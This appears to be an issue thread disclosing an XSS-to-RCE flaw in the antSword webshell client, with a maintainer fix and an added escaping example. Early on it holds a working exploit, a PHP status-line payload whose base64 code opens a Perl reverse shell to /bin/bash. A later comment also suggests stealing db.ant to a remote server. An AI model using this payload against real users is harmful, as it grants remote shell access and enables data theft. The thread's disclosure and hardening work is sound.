I want to apply for a CVE, so I'll write the following in English first. When I connect to my webshell with antSword, if the connection fails, antSword will echo error information like this. This information doesn't have XSS protection, so I can XSS and execute system commands. My PoC:
<?php header('HTTP/1.1 500 <img src=# onerror=alert(1)>');
My exp (for perl)
<?php header("HTTP/1.1 406 Not <img src=# onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxMjcuMC4wLjEiOyRwPTEwMDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())'>"); ?>
The base64-decoded code:
require('child_process').exec('perl -e \'use Socket;$i="127.0.0.1";$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\'',(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });
getshell
~/source/modules/filemanage/index.js 206
toastr.error((err instanceof Object) ? JSON.stringify(err) : String(err), LANG_T['error']);
Please add XSS protection.
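The sink at index.js line 206 hands the raw error string to toastr, which renders it as HTML. As an added example (not antSword's own code), here is the same formatting logic with an HTML-escaping step placed in front of the sink; the `escapeHtml` helper, the toastr stub and the sample status line shaped like the PoC above are all constructed for this example.

```javascript
// Added example, not antSword's code: escape error text before it reaches an HTML-rendering sink.

// Minimal HTML escaping for text that will be inserted into an innerHTML-style sink.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Mirrors the formatting at filemanage/index.js:206 (object -> JSON, otherwise String),
// then neutralises markup so a server-controlled status line cannot inject tags.
function safeErrorMessage(err) {
  const raw = (err instanceof Object) ? JSON.stringify(err) : String(err);
  return escapeHtml(raw);
}

// Assumed stand-in for toastr.error: records what would be rendered as HTML.
const rendered = [];
const toastr = {
  error(message, title) { rendered.push({ message, title }); },
};

// Constructed sample: an HTTP status line shaped like the PoC in the report.
const hostileStatus = 'HTTP/1.1 500 <img src=# onerror=alert(1)>';

// Vulnerable pattern: the raw string goes straight to a sink that renders HTML.
function showErrorUnsafe(err) {
  const msg = (err instanceof Object) ? JSON.stringify(err) : String(err);
  toastr.error(msg, 'Error');
  return msg;
}

// Hardened pattern: escape first, then hand the text to the same sink.
function showErrorSafe(err) {
  const msg = safeErrorMessage(err);
  toastr.error(msg, 'Error');
  return msg;
}

// Detection helper: true when the string still contains something an HTML parser
// would treat as the start of a tag.
function containsMarkup(s) {
  return /<[a-zA-Z!/]/.test(s);
}
```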
Thanks. To prevent similar problems with toastr in plugins, I changed toastr so that it can no longer output HTML; from now on HTML output is not supported.
37f871b
This one is pretty impressive, it's an RCE.
I feel this kind of program architecture is prone to missed XSS-to-RCE cases; how about applying a single unified encode/filter pass to all data coming from the client?
Exciting.
@ViCrack This one was also caused by an oversight at output time. The libraries used in the UI framework are not all the same; for example, grid and tree in dhtmlx encode once before output, whereas toastr outputs HTML by design, so a one-size-fits-all approach isn't a good solution.
Still, exploiting this requires winning a timing race. That said, one could read db.ant and send it to a remote server, taking everything, hahaha.